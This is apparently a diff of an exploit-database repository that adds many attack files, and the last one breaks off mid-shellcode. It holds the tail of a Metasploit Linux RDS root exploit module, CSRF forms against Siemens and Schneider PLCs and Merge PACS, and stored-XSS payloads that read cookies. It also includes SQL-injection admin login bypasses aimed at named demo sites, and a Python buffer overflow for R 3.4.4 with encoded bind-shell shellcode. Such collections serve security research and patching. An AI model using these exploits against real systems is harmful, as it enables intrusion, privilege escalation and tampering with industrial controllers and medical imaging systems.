vprint_good "Linux kernel version #{version} appears to be vulnerable"
|
||||||
|
|
||||||
|
unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
|
||||||
|
vprint_error 'RDS kernel module is not available'
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
vprint_good 'RDS kernel module is available'
|
||||||
|
|
||||||
|
if modules_disabled?
|
||||||
|
unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
|
||||||
|
vprint_error 'RDS kernel module is not loadable'
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
end
|
||||||
|
vprint_good 'RDS kernel module is loadable'
|
||||||
|
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
unless check == CheckCode::Appears
|
||||||
|
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||||
|
end
|
||||||
|
|
||||||
|
if is_root?
|
||||||
|
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||||
|
end
|
||||||
|
|
||||||
|
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||||
|
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||||
|
end
|
||||||
|
|
||||||
|
# Upload exploit executable
|
||||||
|
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||||
|
executable_path = "#{base_dir}/#{executable_name}"
|
||||||
|
if live_compile?
|
||||||
|
vprint_status 'Live compiling exploit on system...'
|
||||||
|
upload_and_compile executable_path, exploit_data('rds-fail.c')
|
||||||
|
else
|
||||||
|
vprint_status 'Dropping pre-compiled exploit on system...'
|
||||||
|
arch = kernel_hardware
|
||||||
|
case arch
|
||||||
|
when /amd64|ia64|x86_64|x64/i
|
||||||
|
upload_and_chmodx executable_path, exploit_data('rds-fail.x64')
|
||||||
|
when /x86|i[3456]86/
|
||||||
|
upload_and_chmodx executable_path, exploit_data('rds-fail.x86')
|
||||||
|
else
|
||||||
|
fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Upload payload executable
|
||||||
|
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
|
||||||
|
upload_and_chmodx payload_path, generate_payload_exe
|
||||||
|
|
||||||
|
# Launch exploit
|
||||||
|
print_status 'Launching exploit...'
|
||||||
|
output = cmd_exec "#{executable_path} #{payload_path}"
|
||||||
|
output.each_line { |line| vprint_status line.chomp }
|
||||||
|
end
|
||||||
|
end
|
15
exploits/linux/webapps/44667.txt
Normal file
15
exploits/linux/webapps/44667.txt
Normal file
|
@ -0,0 +1,15 @@
|
||||||
|
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
|
||||||
|
# Google Dork: inurl:/Portal/Portal.mwsl
|
||||||
|
# Date: 2018-05-21
|
||||||
|
# Exploit Author: t4rkd3vilz, Jameel Nabbo
|
||||||
|
# Vendor Homepage: https://www.siemens.com/
|
||||||
|
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
# CVE: CVE-2015- 5698
|
||||||
|
|
||||||
|
# 1. Proof of Concept
|
||||||
|
|
||||||
|
<form method="POST" action="http://targetIp/CPUCommands">
|
||||||
|
<input name="PriNav" value="Start">
|
||||||
|
<input type="submit" value="Go!">
|
||||||
|
</form>
|
39
exploits/linux/webapps/44681.txt
Normal file
39
exploits/linux/webapps/44681.txt
Normal file
|
@ -0,0 +1,39 @@
|
||||||
|
# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery
|
||||||
|
# Google Dork: -
|
||||||
|
# Date: 2018-05-21
|
||||||
|
# Exploit Author: Safak Aslan
|
||||||
|
# Vendor Homepage: http://www.merge.com/
|
||||||
|
# Version: Merge PACS 7.0
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE: -
|
||||||
|
|
||||||
|
# 1. Proof of Concept
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="https://targetIP/servlet/actions/merge-viewer/summary" method="POST">
|
||||||
|
<input type="hidden" name="amicasUsername" value="merge" />
|
||||||
|
<input type="hidden" name="password" value="viewer" />
|
||||||
|
<input type="hidden" name="submitButton" value="Login" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
Post Data:
|
||||||
|
|
||||||
|
POST /servlet/actions/merge-viewer/summary HTTP/1.1
|
||||||
|
Host: targetIP
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 55
|
||||||
|
Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
amicasUsername=merge&password=viewer&submitButton=Login
|
57
exploits/php/webapps/44661.txt
Normal file
57
exploits/php/webapps/44661.txt
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
|
||||||
|
# Date: 2018-05-20
|
||||||
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
||||||
|
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Kali linux
|
||||||
|
====================================================
|
||||||
|
# Description:
|
||||||
|
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
|
||||||
|
====================================================
|
||||||
|
# POC 1 : Persistent cross site scripting :
|
||||||
|
1) After creating an account , go to your profile.
|
||||||
|
2) Navigate to "Update profile" and put this payload :
|
||||||
|
"/><script>alert('xss')</script>
|
||||||
|
3) You will have an alert box in the page .
|
||||||
|
====================================================
|
||||||
|
# POC 2 : CSRF :
|
||||||
|
Attacker can change user's authentication directly :
|
||||||
|
# User's CSRF exploit :
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>CSRF POC</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form action="http://restaurant.thesoftking.com/updateprofile"
|
||||||
|
method="post">
|
||||||
|
<input type="hidden" name="name" value="anything">
|
||||||
|
<input type="hidden" name="mobile" value="1000000000">
|
||||||
|
<input type="hidden" name="address" value="anything">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
# Admin page CSRF exploit :
|
||||||
|
|
||||||
|
<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
|
||||||
|
method="post">
|
||||||
|
<input name="name" value="exploit" type="hidden">
|
||||||
|
<input name="wcmsg" value="test" type="hidden">
|
||||||
|
<input name="address" value="test2" type="hidden">
|
||||||
|
<input name="mobile" value="1000000" type="hidden">
|
||||||
|
<input name="email" value="test@test.com" type="hidden">
|
||||||
|
<input name="currency" value="decode" type="hidden">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
====================================================
|
||||||
|
# POC 3 : Authentication bypass :
|
||||||
|
# Attacker can bypass admin panel without any authentication :
|
||||||
|
Path : /admin
|
||||||
|
Username : ' or 0=0 #
|
||||||
|
Password : anything
|
||||||
|
====================================================
|
18
exploits/php/webapps/44662.txt
Normal file
18
exploits/php/webapps/44662.txt
Normal file
|
@ -0,0 +1,18 @@
|
||||||
|
# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting
|
||||||
|
# Date: 2018-05-20
|
||||||
|
# Exploit Author: Borna nematzadeh (L0RD)
|
||||||
|
# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1
|
||||||
|
# Version: 2.0
|
||||||
|
# Tested on: Windows
|
||||||
|
|
||||||
|
# Description :
|
||||||
|
Private Message PHP Script 2.0 suffers from persistent cross site scripting.
|
||||||
|
You can put your malicious javascript payload .
|
||||||
|
When target opens your massege , payload will be executed before self destruction .
|
||||||
|
|
||||||
|
# POC :
|
||||||
|
1) Put this payload into textarea and click submit :
|
||||||
|
</textarea><script>alert(document.cookie)</script>
|
||||||
|
|
||||||
|
2) You will get a link which your javascript code is inside this link . You can send this link to anyone .
|
||||||
|
3) After clicking on "show me the message" , payload will be executed .
|
34
exploits/php/webapps/44663.txt
Normal file
34
exploits/php/webapps/44663.txt
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
|
||||||
|
# Date: 2018-05-20
|
||||||
|
# Dork: N/A
|
||||||
|
# Exploit Author: borna nematzadeh (L0RD)
|
||||||
|
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
|
||||||
|
# Version: 1.1.0
|
||||||
|
# Tested on: Kali linux
|
||||||
|
|
||||||
|
# POC 1 : Persistent Cross site scripting :
|
||||||
|
1) After creating an account , navigate to "Edit profile" .
|
||||||
|
2) Put this payload into the "Birthday" and save changes :
|
||||||
|
" onmouseover=alert(document.cookie) "
|
||||||
|
3) You will have an alert box in the page .
|
||||||
|
|
||||||
|
# POC 2 : Cross site request forgery :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>CSRF POC</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
|
||||||
|
<input type="hidden" name="sex" value="Male" />
|
||||||
|
<input type="hidden" name="birthday" value="test" />
|
||||||
|
<input type="hidden" name="uEmail" value="ninjaassassinbn@yahoo.com" />
|
||||||
|
<input type="hidden" name="country" value="United States" />
|
||||||
|
<input type="hidden" name="about" value="test" />
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
// profile will be updated successfully.
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
41
exploits/php/webapps/44664.txt
Normal file
41
exploits/php/webapps/44664.txt
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
|
||||||
|
# Software Link: https://zenar.io/
|
||||||
|
# Dork: N/A
|
||||||
|
# Author: Berk Dusunur
|
||||||
|
# Tested Website: http://demo.zenar.io
|
||||||
|
# Date: 2018-05-20
|
||||||
|
# Category: Web App
|
||||||
|
|
||||||
|
# PoC
|
||||||
|
|
||||||
|
# GET Request:
|
||||||
|
|
||||||
|
POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
|
||||||
|
Host: demo.zenar.io
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Accept: text/plain, */*; q=0.01
|
||||||
|
Origin: http://demo.zenar.io
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
|
||||||
|
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
|
||||||
|
Accept-Language: en-us,en;q=0.5
|
||||||
|
X-Scanner: Netsparker
|
||||||
|
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Length: 273
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com¤t_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
|
||||||
|
|
||||||
|
# Response:
|
||||||
|
|
||||||
|
<input type="hidden" name="formPageHash"
|
||||||
|
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
|
||||||
|
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
|
||||||
|
value="1"/><fieldset
|
||||||
|
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
|
||||||
|
class="page_"><div class="form_fields"></div><div
|
||||||
|
class="form_buttons"><input type="button" value=""
|
||||||
|
class="next"/></div>
|
52
exploits/php/webapps/44679.txt
Normal file
52
exploits/php/webapps/44679.txt
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
|
||||||
|
# Date: 2018-05-21
|
||||||
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
||||||
|
# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Kali linux
|
||||||
|
|
||||||
|
# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
|
||||||
|
|
||||||
|
# POC 1 : Persistent cross site scripting :
|
||||||
|
1) After creating an account , go to your profile.
|
||||||
|
2) Navigate to "Update profile" and put this payload :
|
||||||
|
"/><script>alert(document.cookie)</script>
|
||||||
|
3) You will have an alert box in the page .
|
||||||
|
|
||||||
|
# POC 2 : CSRF :
|
||||||
|
# Attacker can change user's authentication directly :
|
||||||
|
# User's CSRF exploit :
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>CSRF POC</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form action="http://vehicle.thesoftking.com/updateprofile" method="post">
|
||||||
|
<input type="hidden" name="name" value="anything">
|
||||||
|
<input type="hidden" name="mobile" value="200000">
|
||||||
|
<input type="hidden" name="address" value="anything">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
# Admin page CSRF exploit :
|
||||||
|
|
||||||
|
<form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
|
||||||
|
<input name="name" value="test" type="hidden">
|
||||||
|
<input name="wcmsg" value="test" type="hidden">
|
||||||
|
<input name="address" value="test2" type="hidden">
|
||||||
|
<input name="mobile" value="2000000" type="hidden">
|
||||||
|
<input name="email" value="test@test.com" type="hidden">
|
||||||
|
<input name="currency" value="decode" type="hidden">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
|
||||||
|
# POC 3 : Authentication bypass :
|
||||||
|
Path : /admin
|
||||||
|
Username : ' or 0=0 #
|
||||||
|
Password : anything
|
56
exploits/php/webapps/44682.txt
Normal file
56
exploits/php/webapps/44682.txt
Normal file
|
@ -0,0 +1,56 @@
|
||||||
|
# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass
|
||||||
|
# Date: 2018-05-21
|
||||||
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
||||||
|
# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Kali linux
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities :
|
||||||
|
|
||||||
|
# POC 1 : Persistent cross site scripting :
|
||||||
|
1) After creating an account , go to your profile.
|
||||||
|
2) Navigate to "Update profile" and put this payload :
|
||||||
|
"/><script>alert(document.domain)</script>
|
||||||
|
3) You will have an alert box in the page .
|
||||||
|
|
||||||
|
# POC 2 : CSRF : cross site request forgery :
|
||||||
|
|
||||||
|
# User's CSRF exploit :
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>CSRF POC</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form action="http://model.thesoftking.com/updateprofile"
|
||||||
|
method="post">
|
||||||
|
<input type="hidden" name="name" value="anything">
|
||||||
|
<input type="hidden" name="mobile" value="200000">
|
||||||
|
<input type="hidden" name="address" value="anything">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
# Admin page CSRF exploit :
|
||||||
|
|
||||||
|
<form action="http://model.thesoftking.com/admin/setgeneral.php"
|
||||||
|
method="post">
|
||||||
|
<input name="name" value="test" type="hidden">
|
||||||
|
<input name="wcmsg" value="test" type="hidden">
|
||||||
|
<input name="address" value="test2" type="hidden">
|
||||||
|
<input name="mobile" value="1000000" type="hidden">
|
||||||
|
<input name="email" value="test@test.com" type="hidden">
|
||||||
|
<input name="currency" value="decode" type="hidden">
|
||||||
|
</form>
|
||||||
|
<script>
|
||||||
|
document.forms[0].submit();
|
||||||
|
</script>
|
||||||
|
|
||||||
|
# POC 3 : Authentication bypass :
|
||||||
|
# Attacker can bypass admin panel without any authentication :
|
||||||
|
Path : /admin
|
||||||
|
Username : ' or 0=0 #
|
||||||
|
Password : anything
|
12
exploits/php/webapps/44683.txt
Normal file
12
exploits/php/webapps/44683.txt
Normal file
|
@ -0,0 +1,12 @@
|
||||||
|
# Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - Persistent cross site scripting
|
||||||
|
# Date: 2018-05-21
|
||||||
|
# Exploit Author: Borna nematzadeh (L0RD)
|
||||||
|
# Vendor Homepage: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319?s_rank=1327
|
||||||
|
# Version: 1.5
|
||||||
|
# Tested on: Windows
|
||||||
|
|
||||||
|
# POC :
|
||||||
|
1) Create your account and navigate to "Edit profile"
|
||||||
|
2) Put this payload into textarea :
|
||||||
|
</textarea><script>console.log(document.cookie)</script>
|
||||||
|
3) The payload will be executed if someone opens your profile .
|
103
exploits/windows/webapps/44678.txt
Normal file
103
exploits/windows/webapps/44678.txt
Normal file
|
@ -0,0 +1,103 @@
|
||||||
|
# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
|
||||||
|
# Date: 2018-05-12
|
||||||
|
# Exploit Author: t4rkd3vilz
|
||||||
|
# Vendor Homepage: http://www.schneider-electric.com/
|
||||||
|
# Tested on: Windows
|
||||||
|
# CVE: CVE-2013-0663
|
||||||
|
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
|
||||||
|
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
|
||||||
|
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
|
||||||
|
# Category: webapps
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>CSRF POC</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
|
||||||
|
<table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
|
||||||
|
<tr>
|
||||||
|
<td class="inputCell" width="200">
|
||||||
|
<div align="left">
|
||||||
|
<h5>Name:</h5>
|
||||||
|
<script language="javascript" type="text/javascript">
|
||||||
|
<!--//
|
||||||
|
paramLang();
|
||||||
|
switch(getLanguage())
|
||||||
|
{
|
||||||
|
|
||||||
|
default:
|
||||||
|
document.write("Username :"); break;
|
||||||
|
}
|
||||||
|
//-->
|
||||||
|
</script>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
<td class="inputCell" width="190">
|
||||||
|
<input type="text" name="user" size="20">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="inputCell" width="200">
|
||||||
|
<div align="left">&
|
||||||
|
<h5>Pass:</h5>
|
||||||
|
<script language="javascript" type="text/javascript">
|
||||||
|
<!--//
|
||||||
|
switch(getLanguage())
|
||||||
|
{
|
||||||
|
default:
|
||||||
|
document.write("New password :"); break;
|
||||||
|
}
|
||||||
|
//-->
|
||||||
|
</script>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
<td class="inputCell" width="190">
|
||||||
|
<input type="password" name="passwd" size="20">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td class="inputCell" width="200">
|
||||||
|
<div align="left">
|
||||||
|
<h5>Verify Pass:</h5>
|
||||||
|
<script language="javascript" type="text/javascript">
|
||||||
|
<!--//
|
||||||
|
switch(getLanguage())
|
||||||
|
{
|
||||||
|
|
||||||
|
default:
|
||||||
|
document.write("Confirm password :"); break;
|
||||||
|
}
|
||||||
|
//-->
|
||||||
|
</script>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
<td class="inputCell" width="190">
|
||||||
|
<input type="password" name="cnfpasswd" size="20">
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br>
|
||||||
|
<div align="center">
|
||||||
|
<script language="javascript" type="text/javascript">
|
||||||
|
<!--//
|
||||||
|
switch(getLanguage())
|
||||||
|
{
|
||||||
|
|
||||||
|
default:
|
||||||
|
document.write('<input type="submit" name="subhttppwd" value="Change Password">'); break;
|
||||||
|
}
|
||||||
|
//-->
|
||||||
|
</script>
|
||||||
|
<input type="submit" name="subhttppwd" value="Change Password">
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
<br>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td align="center">
|
||||||
|
<br>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
132
exploits/windows_x86/local/44680.py
Executable file
132
exploits/windows_x86/local/44680.py
Executable file
|
@ -0,0 +1,132 @@
|
||||||
|
# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
|
||||||
|
# Exploit Author: Hashim Jawad
|
||||||
|
# Exploit Date: 2018-05-21
|
||||||
|
# Vendor Homepage: https://www.r-project.org/
|
||||||
|
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
|
||||||
|
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
|
||||||
|
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
|
||||||
|
|
||||||
|
# Credit to bzyo for finding the bug (44516)
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
import struct
|
||||||
|
|
||||||
|
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
|
||||||
|
#Payload size: 718 bytes
|
||||||
|
shellcode = ""
|
||||||
|
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
|
||||||
|
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
|
||||||
|
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
|
||||||
|
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
|
||||||
|
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||||
|
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
|
||||||
|
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
|
||||||
|
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
|
||||||
|
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
|
||||||
|
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
|
||||||
|
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
|
||||||
|
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
|
||||||
|
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
|
||||||
|
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
|
||||||
|
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
|
||||||
|
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
|
||||||
|
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
|
||||||
|
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
|
||||||
|
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
|
||||||
|
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
|
||||||
|
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
|
||||||
|
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
|
||||||
|
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
|
||||||
|
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
|
||||||
|
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
|
||||||
|
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
|
||||||
|
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
|
||||||
|
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
|
||||||
|
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
|
||||||
|
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
|
||||||
|
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
|
||||||
|
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
|
||||||
|
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
|
||||||
|
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
|
||||||
|
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
|
||||||
|
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
|
||||||
|
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
|
||||||
|
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
|
||||||
|
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
|
||||||
|
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
|
||||||
|
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
|
||||||
|
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
|
||||||
|
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
|
||||||
|
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
|
||||||
|
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
|
||||||
|
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
|
||||||
|
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
|
||||||
|
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
|
||||||
|
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
|
||||||
|
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
|
||||||
|
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
|
||||||
|
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
|
||||||
|
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
|
||||||
|
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
|
||||||
|
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
|
||||||
|
